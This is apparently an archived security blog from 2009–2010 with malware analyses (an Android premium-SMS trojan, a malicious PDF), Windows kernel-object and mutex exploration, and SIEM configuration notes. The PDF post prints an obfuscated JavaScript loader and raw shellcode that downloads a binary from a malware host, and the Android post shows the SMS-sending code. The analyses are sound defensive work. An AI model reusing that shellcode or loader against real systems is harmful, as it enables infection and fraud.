Jaime Blasco Blog : /

Analysis of Trojan-SMS.AndroidOS.FakePlayer.a
Tue, 10 Aug 2010

Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android Smartphones.

The program camouflages itself to look like a media player application and begins sending SMS to premium numbers without the user's knowledge.

To analyze the .APK android file we can use the android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program behaviour.

Let's start decoding the resources with apktool:

pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk 
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk
I: Copying assets and libs...

Apktool obtains the following files from the APK:

pc201166154132:fakeplayer jaimeblasco$ find ./
./
.//RU
.//RU/AndroidManifest.xml
.//RU/apktool.yml
.//RU/res
.//RU/res/drawable
.//RU/res/drawable/icon.png
.//RU/res/layout
.//RU/res/layout/main.xml
.//RU/res/values
.//RU/res/values/public.xml
.//RU/res/values/strings.xml
.//RU/smali
.//RU/smali/org
.//RU/smali/org/me
.//RU/smali/org/me/androidapplication1
.//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali
.//RU/smali/org/me/androidapplication1/DataHelper.smali
.//RU/smali/org/me/androidapplication1/HelloWorld.smali
.//RU/smali/org/me/androidapplication1/MoviePlayer.smali
.//RU/smali/org/me/androidapplication1/R$attr.smali
.//RU/smali/org/me/androidapplication1/R$drawable.smali
.//RU/smali/org/me/androidapplication1/R$layout.smali
.//RU/smali/org/me/androidapplication1/R$string.smali
.//RU/smali/org/me/androidapplication1/R.smali

If we open the file RU/AndroidManifest.xml we can see that the application request the android permission android.permission.SEND_SMS when it is installed.


?xml version="1.0" encoding="UTF-8"?
manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android"
    application android:icon="@drawable/icon"
        activity android:label="Movie Player" android:name=".MoviePlayer"
            intent-filter
                action android:name="android.intent.action.MAIN" 
                category android:name="android.intent.category.LAUNCHER"
            intent-filter
        activity
    application
    uses-permission android:name="android.permission.SEND_SMS"

We observe that the application does some SQLite operations on /RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:


# static fields
.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"

.field private static final DATABASE_VERSION:I = 0x1

.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values (\'was\')"

.field private static final TABLE_NAME:Ljava/lang/String; = "table1"

The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:

    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 37
    :goto_0
    const-string v1, "3354"

    .line 39
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1

The application uses the sendTextMessage function from the Android API:

public final void  sendTextMessage  (String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)

So, the malicious program tries to send SMS's to destination 798657 using the service center addresses (SMSC) 3353 and 3354.

As we can see, this is a very simple piece of malware and it hasn't got spreading capabilities so the risk is low because it wasn't on Android Market.

posted at: 19:30 | path: /Malware | permanent link to this entry | 1 comments |

Scada: New threat targets critical infrastructure systems
Mon, 26 Jul 2010

A new malware called Stuxnet is currently targeting Scada systems. This could be one of the thousands of pieces of malware used by criminals but I want to emphasize some of the characteristics that make this attempt important enough to think over.

The malware is designed specifically to attack Siemens WinCC systems. This software controls and monitors industrial processes such as water treatment, gas pipelines, electrical distribution systems and so son. The malware takes advantage of default system credentials and seems to steal schematics information. (http://www.securityfocus.com/bid/41753)

Stuxnet uses a previously unknown vulnerability that affects the current versions of Windows. The vulnerability affects the Windows Shell that incorrectly parses shortcuts letting malicious code being executed when the icon is displayed. This can be exploited through USB drives or network shares. (POC: http://www.exploit-db.com/exploits/14403/)

The drivers dropped by the malware are signed with a digital certificate belonging to Realtek so we can assume that the malware authors gained access to Realtek's private key.

A high number of infections have been reported in Iran, Indonesia, India, Azerbaijan and the United States. Coincidence?

Who is behind Stuxnet? Anyway, this is a successful attempt to attack high-value assets around the world and whoever did this is highly skilled, well funded and possibly motivated by political, economical or military reasons.

posted at: 13:02 | path: /Scada Security | permanent link to this entry | 0 comments |

Malware: Troyak-AS and Peer activity
Sun, 14 Mar 2010

Last week Troyak-AS has been taken offline. The number of Zeus C&C servers has been decreasing steeply because of the coordinated operation.

Here you can find a list of AS50215 Troyak-as peers that conform the neighborhood of one of the most active cybercrime networks.

I want to share with you some graphs of these peers that shows the malicious activity of some of the AS's involved on this network during Q1 of 2010.

The data has been extracted from one of Alienvault sandnets.

AS-42229 MARIAM-AS PP Mariam	AS-44107 PROMBUDDETAL-AS Prombuddetal LLC	AS-47560 VESTEH-NET-as Vesteh LLC

AS-50369 VISHCLUB-as Kanyovskiy Andriy	AS-5577 ROOT SA	AS-8342 RTCOMM-AS RTComm.RU Autonomous System

posted at: 21:29 | path: /Malware | permanent link to this entry | 3 comments | malware, visualization, Zeus, Botnet

Attacks: Wireless Intrusion Detection Systems Testing Tool
Thu, 07 Jan 2010

To celebrate the New Year I want to share with you a simple but useful tool I wrote some time ago.

The script generates wireless packets to emulate wireless attacks with the intention of testing wireless intrusion detection systems.

At this moment it supports the following attacks:

Send Probe-response packets with a SSID IE tag component of length 0 (WVE-2006-0064)

Floods the WLAN with disassociation packets. (WVE-2005-0046)

Floods the WLAN with deauthentication packets. (WVE-2005-0045)

Sends invalid deauthentication reason code

Sends an over-sized SSID. (WVE-2006-0071, WVE-2007-0001)

Sends airjack beacon packet. (WVE-2005-0018)

Sends an an invalid channel number in beacon frames (WVE-2006-0050)

Windows XP SP1 behaviour

To run the tool you need Scapy.

Source Code

You can use the tool to test that your Ossim wireless sensor with Kismet works as you expect:

posted at: 19:48 | path: /Attacks | permanent link to this entry | 0 comments | wireless ids,wids,attacks,wireless security, wireless attacks, wve, Wireless Vulnerabilities and Exploits

General: Exploring Windows Objects ACL's
Tue, 29 Dec 2009

In the last post, we talked about mutex objects and how to enumerate them. Today we'll learn how to check mutex access lists from WinDBG as well as from user-mode extending the EnumerateMutex example.

Let's see an example using WinDBG. First query the "\BaseNamedObjects" directory that usually contains mutex objects:

lkd> !object \BaseNamedObjects
Object: e18ce788  Type: (823ed418) Directory
    ObjectHeader: e18ce770 (old version)
    HandleCount: 71  PointerCount: 593
    Directory Object: e1001150  Name: BaseNamedObjects

    Hash Address  Type          Name
    ---- -------  ----          ----
     00  e15a8880 SymbolicLink  Local
         81e996d0 Event         userenv: Machine Group Policy has been applied
         82286598 Mutant        SHIMLIB_LOG_MUTEX
         82308700 Mutant        ZonesCacheCounterMutex
         e1dfe298 Section       CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-412668190-839522115-500
         817e3ea0 Timer         userenv: refresh timer for 1048:768
         e1f12ed8 Section       MSCTF.MarshalInterface.FileMap.MPJ.DI.HDGDJDJ
         813f90d0 Event         CorDBIPCLSEventReadName_5752
         e25994a8 Section       Cor_Private_IPCBlock_4760
         e2319518 Section       Cor_Private_IPCBlock_4448
         e1fc1818 Section       MSCTF.MarshalInterface.FileMap.ILD.FOB.FNOEBJE
         8231e468 Event         userenv: machine policy force refresh event
         82196f50 Event         jjCSCSessEvent_UM_KM_0
         82111148 Event         AgentToWkssvcEvent

Now query one of them:

lkd> !object \BaseNamedObjects\SHIMLIB_LOG_MUTEX
Object: 82286598  Type: (823c55e0) Mutant
    ObjectHeader: 82286580 (old version)
    HandleCount: 8  PointerCount: 9
    Directory Object: e18ce788  Name: SHIMLIB_LOG_MUTEX

And query the object header at 82286580:

lkd> dt nt!_OBJECT_HEADER  82286580
   +0x000 PointerCount     : 9
   +0x004 HandleCount      : 8
   +0x004 NextToFree       : 0x00000008 
   +0x008 Type             : 0x823c55e0 _OBJECT_TYPE
   +0x00c NameInfoOffset   : 0x10 ''
   +0x00d HandleInfoOffset : 0 ''
   +0x00e QuotaInfoOffset  : 0 ''
   +0x00f Flags            : 0x20 ' '
   +0x010 ObjectCreateInfo : 0x8055a000 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8055a000 
   +0x014 SecurityDescriptor : 0xe1756a7e 
   +0x018 Body             : _QUAD

The security descriptor is at 0xe1756a7e so, convert it:


lkd> ?? 0xe1756a7e & ~0x7
unsigned int 0xe1756a78

And then we can check the information we wanted:


lkd> !sd 0xe1756a78 0
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8004
            SE_DACL_PRESENT
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544
->Group   : S-1-5-18
->Dacl    : 
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x44
->Dacl    : ->AceCount   : 0x2
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
->Dacl    : ->Ace[0]: ->SID: S-1-5-18

->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[1]: ->AceFlags: 0x0
->Dacl    : ->Ace[1]: ->AceSize: 0x18
->Dacl    : ->Ace[1]: ->Mask : 0x00120001
->Dacl    : ->Ace[1]: ->SID: S-1-5-32-544

->Sacl    :  is NULL

So now that we now how to check an object ACL via WinDBG, let's take advantage of .NET classes inside System.Security.AccessControl namespace to query objects ACL's.

We can query a previously created mutex object via Mutex.OpenExisting method:

[SecurityPermissionAttribute(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public static Mutex OpenExisting(
    string name,
    MutexRights rights
)

We'll use MutexRights.ReadPermissions to be able to read ACL information and then call Mutex.GetAccessControl to read access control information.

Here is the EnumerateMutex example extended to print ACL information from mutexs inside object directories:

(Tested on Windows XP SP2 and Windows 7)

Example:

This method can be useful to identify weak ACL's that can lead to a local Denial of Service. Example Winsock Mutex Vulnerability

Regards

posted at: 17:32 | path: /General | permanent link to this entry | 1 comments |

Malware: Exploring mutex objects
Mon, 28 Dec 2009

A mutex, also called a lock is a program object commonly used to avoid simultaneous access to a resource, such a variable.

It's used in concurrent programming to allow multiple program threads to share the same resource.

Mutexs are usually used by malware creators to avoid the infection of a system by different instances of the same malware. When the trojan infects a system, the first step is to obtain a handle to a "named" mutex, if the process fails, then the malware exits.

The easiest way to check for the presence of a Mutex is using the CreateMutex Function

HANDLE WINAPI CreateMutex(
	__in_opt  LPSECURITY_ATTRIBUTES lpMutexAttributes,   
	__in      BOOL bInitialOwner,   __in_opt  LPCTSTR lpName );

This is the same function that malware uses for checking if the system is infected so one approach to detect the presence of a piece of malware is trying to obtain a handle to the created mutex.

Here is a list of some malwares (md5's) and the Mutex created:

60f733d6d0b077e4a668fb49aab44a30, xx464dg433xx16
fb663100308285afb4debdcab8d67fe2, 6E523163793968624
47c6313ec393d0c55d57529e2a9a418d, Security Tool
72631c3c853d706daf1153b3c8fea54f, psec_once
c37f47c9071eed101a67532e5d412171, YMING
cdcd59a5fb80808cad7376c001586c6e, 290541776
6013de3fed84d40bb173ec23f408a67e, mymutsglwork
62a3f867becfea136aea4ec83a4d9c44, 5BB0650C
5f33aa0b5660bc932af969301635d818, XGBPPAQHSE
2e40abf579e4d8d5d1ba7df34d5e507a, _!SHMSFTHISTORY!_

I've uploaded a small piece of code in .NET (console) using PInvoke that takes the name of the mutex to check for.

(Tested on Windows XP SP2 and Windows 7)

Example:

You can use this small application to quickly check if a system is compromised if you know the name of the mutex created by the malware.
In the previous post, we talked about the Windows Kernel Objects as well as the "Object directories".
We learnt how to query a directory using WinDBG and we found that Mutex as well as other kernel objects are present inside directories.
So now I will explain how to query object directories from user land via NtQueryDirectoryObject to list mutexs present in the system.

We will use the functions NtOpenDirectoryObject and NtQueryDirectoryObject

NTSTATUS WINAPI NtOpenDirectoryObject(   
	__out  PHANDLE DirectoryHandle,   
	__in   ACCESS_MASK DesiredAccess,   
	__in   POBJECT_ATTRIBUTES ObjectAttributes );

NTSTATUS WINAPI NtQueryDirectoryObject(
	   __in       HANDLE DirectoryHandle,   
	   __out_opt  PVOID Buffer,   
	   __in       ULONG Length,   
	   __in       BOOLEAN ReturnSingleEntry,  
	   __in       BOOLEAN RestartScan,   
	   __inout    PULONG Context,   
	   __out_opt  PULONG ReturnLength );

So the best approach to enumerate the Mutex objects is to traverse all the directories beginning with the root directory (""\\"") and check for "Mutex objects" inside the directory.
We have to take into account that a directory may contains another directory so we have to traverse all of them.

Here is another piece of code to enumerate all the mutex present in the system:

(Tested on Windows XP SP2 and Windows 7)

Example:

Remember that Windows Objects belongs to a namespace and each user session has a different namespace so you will retrieve different results from different user sessions.

I was looking at some mutex results an then I found these:

0x16F:Mutant                   VMwareGuestDnDDataMutex
0x170:Mutant                   VMwareGuestCopyPasteMutex

I think is another interesting trick to detect the presence of a system running inside Vmware.
Searching the Internet I found this report from ThreatExpert about a malware called W32.Neshuta that creates exactly the previous two mutexs.
So the question is if the malware checks for the presence of Vmware with this technique (I bet you a beer) or it uses the same mutants to hide and deceive computer users.

posted at: 19:59 | path: /Malware | permanent link to this entry | 2 comments |

General: Windows Kernel Objects
Thu, 24 Dec 2009

The Windows Kernel offers different resources to developers: Process, Socket, Thread, Mutex...

A kernel object is a memory block which structure has different members containing information about the object.
There are common members across all object types (like security descriptor) but each object type has its own specific members (like ID of a Process object).

Let's begin playing with WinDbg that can be used to debug windows in kernel mode.

The best way to retrieve the list of kernel objects is to query the ObjectTypes directory:

lkd> !object \ObjectTypes
Object: e1000110  Type: (823ed418) Directory
    ObjectHeader: e10000f8 (old version)
    HandleCount: 0  PointerCount: 25
    Directory Object: e1001150  Name: ObjectTypes

    Hash Address  Type          Name
    ---- -------  ----          ----
     00  823ed418 Type          Directory
     01  823c8ca0 Type          Thread
         823c55e0 Type          Mutant
     03  82335770 Type          FilterCommunicationPort
     05  823b4958 Type          Controller
     07  823ed5e8 Type          Type
         823c4ca0 Type          Profile
         823c5980 Type          Event
     09  823ed248 Type          SymbolicLink
         823c4560 Type          Section
         823c57b0 Type          EventPair
     10  823c4730 Type          Desktop
     11  823c4e70 Type          Timer
     12  823c4900 Type          WindowStation
         823eb040 Type          File
     16  823b45b8 Type          Driver
     18  823ae250 Type          WmiGuid
         823c4ad0 Type          KeyedEvent
     19  823c8040 Type          Token
         823b4788 Type          Device
     20  823c8408 Type          DebugObject
     21  823b43e8 Type          IoCompletion
     22  823c8e70 Type          Process
     24  823b4b28 Type          Adapter
     26  823c18a0 Type          Key
     28  823c8ad0 Type          Job
     31  823ec3d0 Type          WaitablePort
         823ec5a0 Type          Port
     32  823c5410 Type          Callback
     33  82335940 Type          FilterConnectionPort
     34  823c4040 Type          Semaphore

Then we have a list with all the available object types managed by the Kernel.

We can get more info about an object type querying its address:

lkd> dt _OBJECT_TYPE 823c4900 
ntdll!_OBJECT_TYPE
   +0x000 Mutex            : _ERESOURCE
   +0x038 TypeList         : _LIST_ENTRY [ 0x823c4938 - 0x823c4938 ]
   +0x040 Name             : _UNICODE_STRING "WindowStation"
   +0x048 DefaultObject    : (null) 
   +0x04c Index            : 0x11
   +0x050 TotalNumberOfObjects : 5
   +0x054 TotalNumberOfHandles : 0x76
   +0x058 HighWaterNumberOfObjects : 5
   +0x05c HighWaterNumberOfHandles : 0x80
   +0x060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x0ac Key              : 0x646e6957
   +0x0b0 ObjectLocks      : [4] _ERESOURCE

And ever more information:

lkd> dt _OBJECT_TYPE_INITIALIZER 823c55e0 
ntdll!_OBJECT_TYPE_INITIALIZER
   +0x000 Length           : 0x5690
   +0x002 UseDefaultObject : 0x3c '<'
   +0x003 CaseInsensitive  : 0x82 ''
   +0x004 InvalidAttributes : 0x823c5908
   +0x008 GenericMapping   : _GENERIC_MAPPING
   +0x018 ValidAccessMask  : 0
   +0x01c SecurityRequired : 0 ''
   +0x01d MaintainHandleCount : 0 ''
   +0x01e MaintainTypeList : 0 ''
   +0x020 PoolType         : 0 ( NonPagedPool )
   +0x024 DefaultPagedPoolCharge : 0
   +0x028 DefaultNonPagedPoolCharge : 0
   +0x02c DumpProcedure    : (null) 
   +0x030 OpenProcedure    : (null) 
   +0x034 CloseProcedure   : (null) 
   +0x038 DeleteProcedure  : 0x823c5618     void  +ffffffff823c5618
   +0x03c ParseProcedure   : 0x823c5618     long  +ffffffff823c5618
   +0x040 SecurityProcedure : 0x000e000c     long  +e000c
   +0x044 QueryNameProcedure : 0xe1005498     long  +ffffffffe1005498
   +0x048 OkayToCloseProcedure : (null)

All the kernel objects are managed by the object manager which manage all the resources: kernel data structures, kernel references, user references, synchronization...

The Windows Kernel provides "Object directories" to categorize objects being managed according to the types. For example we previously queried the ObjectTypes directory to retrieve the list of object types.

Another example, query the \Drivers directory to get the list of drivers present on the system:

lkd> !object \Driver
Object: e1023908  Type: (823ed418) Directory
    ObjectHeader: e10238f0 (old version)
    HandleCount: 0  PointerCount: 96
    Directory Object: e1001150  Name: Driver

    Hash Address  Type          Name
    ---- -------  ----          ----
     00  823343b0 Driver        NDIS
         82335340 Driver        KSecDD
         82171320 Driver        Beep
     01  8217ef38 Driver        Raspti
         82233260 Driver        Mouclass
         8217dd68 Driver        es1371
     02  82060030 Driver        vmx_svga
...
...

In the next post I will explain the way to query object directories from user land via NtQueryDirectoryObject [Ntdll.dll] and take advantage of it for incident response and malware detection.

posted at: 01:24 | path: /General | permanent link to this entry | 0 comments |

Exploits: Analyzing a malicious PDF Document
Mon, 21 Dec 2009

In this post I will explain a real case example of how to manually analyze a malicious PDF document.
Some days ago I collected a malicious PDF file, usually Wepawet does an excellent job and automatically analyze the malicious file for you.
In this case Wepawet said "No exploits were identified." so probably the malicious PDF file uses some tricks against automatic analysis.

We start collecting some information of the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

Collect some PDF object information to begin the analysis using Didier Stevens pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php 
PDFiD 0.0.9 pdf.php
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 3
 endstream              3
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

Now we know there is some javascript and filter objects we should analyze, first we search for Filter objects inside the PDF using Didier Stevens pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php 
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

obj 6 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>

We have two streams that should be carefully analyzed, let's see the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 4852 /Filter /FlateDecode
 >>


 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa 
443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd 
assa 443562df sdfs
23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df.........
...........
...........
...........

We have 172K of stream data, we save it for later analyze. Now dump the obj 6 raw data:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more
obj 6 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 299 /Filter /FlateDecode
 >>


 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>

 
var jxtDqSSfQPmE1 = "";

function cCrqddqiDoTmt(GEoyx8oatAOWi,g7UwbOwqmi0NT,g7UwbOwqmi0NTasd,g7UwbOwqmi0NTbbb)
{
var kokk = eval;
kokk(GEoyx8oatAOWi);
}

function WGBsiR5aIiD9Q(g7UwbOwqmi0NT,g7UwbOwqmi0NTka,g7UwbOwqmi0NTllol,g7UwbOwqmi0NTbban,g7UwbOwqmi0NTkkkl)
{
var uWReX84wKBTnU = "%";
VDzBdR9Xfzz8e = this.info.title;
jxtDqSSfQPmE1 = VDzBdR9Xfzz8e.replace(/colkokasd assa 443562df sdfs232342/g,uWReX84wKBTnU);
eval("var COPC8XTJPCkUm = u"+"nes"+"cape(jxtDqSSfQPmE1);");
cCrqddqiDoTmt(COPC8XTJPCkUm);
}

WGBsiR5aIiD9Q();

This is much better, we have some javascript eval, unescape functions and a reference to this.info.title.
If we inspect the info.title we realize it's linked with the obj 5 0 data with extracted.

As we can see, the javascript code replace "colkokasd assa 443562df sdfs232342" from the obj 5 stream with the var uWReX84wKBTnU ("%")

To emulate the javascript code, first we dump the obj5 data and then use sed to replace data:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5
sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5

We create a js file with the data replace inside var JmfNzd7NdGNhf = "%66%75%6e%63%74%69%6f%6.......... " and then call print(unescape(JmfNzd7NdGNhf));.

If we execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js

Download the unobfuscated data from here

Now we have the unobfuscated javascript code. The PPPDDDFF() version check for the Acrobat Reader version using the app.viewerVersion Adobe Javascript function and exploits a different vulnerability on each of the identified versions:

CVE-2007-5659: Exploiting Collab.collectEmailInfo()

CVE-2008-2992: Exploiting util.printf()

CVE-2009-0927: Exploiting Collab.getIcon()

We also found a shellcode, here is the raw data extracted using SpiderMonkey:

shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \
                        "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \
                        "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \
                        "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \
                        "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \
                        "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \
                        "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \
                        "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \
                        "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \
                        "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \
                        "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \
                        "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \
                        "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \
                        "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \
                        "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX), here is the analysis data:

VirusTotal

ThreatExpert

posted at: 14:01 | path: /Exploits | permanent link to this entry | 2 comments |

Ossim: Using Cisco SDEE Protocol to collect security events.
Thu, 29 Oct 2009

We added support to collect events via Security Device Event Exchange (SDEE) Protocol that lets us capture events from:

Cisco Network Prevention Systems (IPS)

Cisco Network Detection Systems (IPS)

Cisco Switch IDS

Cisco IOS routers with Inline Intrusion Prevention System (IPS) functions

Cisco IDS modules for routers

Cisco PIX Firewalls

Cisco Catalyst 6500 Series firewall services modules (FWSMs)

Cisco Management Center for Cisco security agents

CiscoWorks Monitoring Center for Security servers

This protocol replaces Remote Data Exchange Protocol (RDEP).

Ossim has the possibility of collecting via SDEE and supports inventory correlation (OS Correlation).

Configuration:

- Updating plugin sids with the latest IPS signature update package:

If you have your own update package from your vendor, you can populate the Ossim database with the new signatures.

To update plugin sid information, go to /usr/share/ossim/scripts/:

mac-jaime:scripts$ python createCiscoIPSSidmap.py IOS-S416-CLI.pkg.xml
DELETE FROM plugin WHERE id = "1597";

DELETE FROM plugin_sid where plugin_id = "1597";

INSERT INTO plugin (id, type, name, description) VALUES (1597, 1, 'Cisco-IPS', 'Cisco Intrusion Prevention System');

INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5986, NULL, NULL, 'Cisco-IPS: Microsoft GDI+ GIF Parsing Vulnerability', 3, 4);
INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5984, NULL, NULL, 'Cisco-IPS: IE COM Object Code Execution', 3, 4);
INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5985, NULL, NULL, 'Cisco-IPS: Quicktime RTSP Content-Type  Excessive Length', 3, 4);
INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 19159, NULL, NULL, 'Cisco-IPS: Green Dam Youth Escort Software Update Check', 1, 4);
INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 19401, NULL, NULL, 'Cisco-IPS: Microsoft Publisher File Parsing Vulnerability', 3, 4);
...
...

This script will generate the needed SQL information to update Ossim database, to insert the information:

mac-jaime:scripts$ python createCiscoIPSSidmap.py IOS-S416-CLI.pkg.xml > sdee.sql
mac-jaime:scripts$ ossim-db < sdee.sql

If you want to update cross-correlation information:

mac-jaime:scripts$ python ciscoIPSOsMap.py IOS-S416-CLI.pkg.xml

replace into plugin_reference values (1597, 1109, 3001, 3);
replace into plugin_reference values (1597, 1109, 3001, 3);
replace into plugin_reference values (1597, 1109, 3001, 3);
replace into plugin_reference values (1597, 1109, 3001, 3);
replace into plugin_reference values (1597, 2156, 3001, 1);
replace into plugin_reference values (1597, 2157, 3001, 3);
replace into plugin_reference values (1597, 2157, 3001, 3);
replace into plugin_reference values (1597, 2157, 3001, 3);
...
...

mac-jaime:scripts$ python ciscoIPSOsMap.py IOS-S416-CLI.pkg.xml > sdee-os.sql
mac-jaime:scripts$ ossim-db < sdee-os.sql

Remember to restart ossim-server in order to update Ossim server cache.

- Configuring Ossim Agent to collect from SDEE capable device:

Add sdee reference to /etc/ossim/agent/config.cfg

Edit /etc/ossim/agent/plugins/cisco-ips.cfg:

[DEFAULT]
plugin_id=1597

[config]
type=detector
enable=yes

source=sdee
source_ip=
user=
password=
sleep=5

process=
start=no
stop=no

Insert your source_ip, user and password data.

Restart the ossim agent and it should begin receiving data from the SDEE device.

- Common problems:

When you begin a session with a SDEE device, it will provide you with a Subscription ID. Sometimes if the device close the connection or you loss connectivity you have to close the session in order to continue collecting from the device.

Ossim Agent will automatically do it but if for some reason it can't, you should manually close the session.

You will find the latest Subscription ID provided in /etc/ossim/agent/sdee_sid.data

Configure your device credentials on /usr/share/ossim/scripts/closeSDEEsession.py and execute:

mac-jaime:scripts$ python /usr/share/ossim/scripts/closeSDEEsession.py SubscriptionID

This should close the last session. If you still have problems you can execute:

mac-jaime:scripts$ grep subs /var/log/ossim/agent.log

To obtain a list of the last Subscription ID's used.

posted at: 11:49 | path: /Ossim | permanent link to this entry | 0 comments |

Lua: LUHN checksum algorithm Lua implementation
Sat, 12 Sep 2009

I have wrote a LUA function that implements the LUHN checksum algorithm (requires bitlib), this algorithm checks that a sequence of digits is a valid credit card number. Here is the code:

local bit = require("bit")
local band, bor, bxor = bit.band, bit.bor, bit.bxor

function checksum(card)
	num = 0
